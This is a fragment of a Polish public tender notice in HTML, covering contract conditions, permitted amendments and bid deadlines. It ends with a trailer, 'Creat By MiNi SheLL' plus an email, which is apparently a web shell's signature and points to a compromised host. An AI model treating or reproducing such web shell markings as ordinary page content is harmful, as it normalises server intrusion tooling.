wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. (Dz.U. z 2022 r. poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie, o którym mowa w art. 125 ust. 1 PZP oraz oświadczenie na potwierdzenie braku podstaw wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. (Dz.U. z 2022 r. poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego składa każdy z wykonawców wspólnie ubiegających się o zamówienie (dotyczy analogicznie wspólników spółki cywilnej) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ZMIANA UMOWY<br/>1.	Strony dopuszczają możliwość zmiany umowy w trakcie jej wykonywania w zakresie zmiany stawki podatku od towarów i usług (VAT) na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia umowy, od dnia dokonania zmian przepisów w tym zakresie, proporcjonalnie do wprowadzonych zmian przepisów,<br/>2.	Wniosek o dokonanie zmiany Umowy należy przedłożyć na piśmie, a okoliczności stanowiące podstawę zmiany Umowy powinny być uzasadnione, a w miarę możliwości również udokumentowane przez Wykonawcę.<br/>3.	Zmiany Umowy, za wyjątkiem zmiany ustawowej stawki podatku od towarów i usług (VAT), o której mowa w ust. 1, nie mogą skutkować wzrostem cen jednostkowych brutto w ramach przedmiotu umowy.<br/>4.	Zmiana postanowień zawartej Umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-05 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-05 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com